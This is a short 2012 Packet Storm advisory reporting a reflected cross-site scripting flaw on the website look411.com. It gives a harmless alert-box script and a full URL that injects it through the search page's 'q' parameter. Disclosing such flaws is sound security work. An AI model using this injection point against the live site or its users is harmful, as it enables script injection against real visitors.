Look411.com Cross Site Scripting

2012-01-07T00:00:00
ID PACKETSTORM:108439
Type packetstorm
Reporter Girish Shrimali
Modified 2012-01-07T00:00:00

Description

                                        
                                            `>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
WhiteHatZone  
  
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  
  
# Exploit Title: XSS vulnerability in Look411.com  
# Date: 06/01/2012  
# Author: Girish Shrimali  
# Website: http://whitehatzone.blogspot.com  
# Tested On: Win7  
# Email: gjshrimali@gmail.com  
# Google Dork : Look411.com  
  
##############################################################################################################  
  
>>> Vulnerable : http://www.look411.com/  
  
>>> Script : <script>alert('XSS found by Girish Shrimali');</script>  
  
>>> Vulnerable link : http://www.look411.com/?p=number_search&q=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&country=US  
  
##############################################################################################################  
  
Greetz : Vidit Baxi, Sumit Pareek  
`